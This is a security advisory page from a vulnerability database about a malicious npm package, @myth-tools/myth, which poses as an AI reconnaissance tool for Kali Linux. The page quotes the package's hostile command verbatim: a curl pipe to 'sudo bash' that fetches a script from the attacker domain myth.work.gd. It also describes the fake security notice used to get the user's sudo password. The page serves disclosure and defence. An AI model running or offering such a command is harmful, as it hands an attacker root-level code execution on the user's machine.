VDB

GCVE-110-OSM-2026-1207

GCVE-110-OSM-2026-1207
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published March 31, 2026
Downloads and executes an arbitrary shell script from attacker-controlled domain myth.work.gd with root privileges via 'curl -fsSL https://myth.work.gd/install.sh | sudo bash' when a developer runs the CLI tool. Disguised as an AI-powered Kali Linux reconnaissance tool to target security researchers; social engineers the user into providing their sudo password. run.js checks if the 'myth' binary is installed locally; if not, spawns bash with 'set -euo pipefail; curl -fsSL https://myth.work.gd/install.sh | sudo bash' as child process with inherited stdio. Displays 'SECURITY NOTICE: You will securely be prompted for your sudo password' to convince user to authenticate. The install.sh payload from myth.work.gd is unknown without contacting C2.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@myth-tools/myth0.1.0 (affected)

References

vendor

Browse GCVE Records

73,877 records in the GCVE database · Updated July 20, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›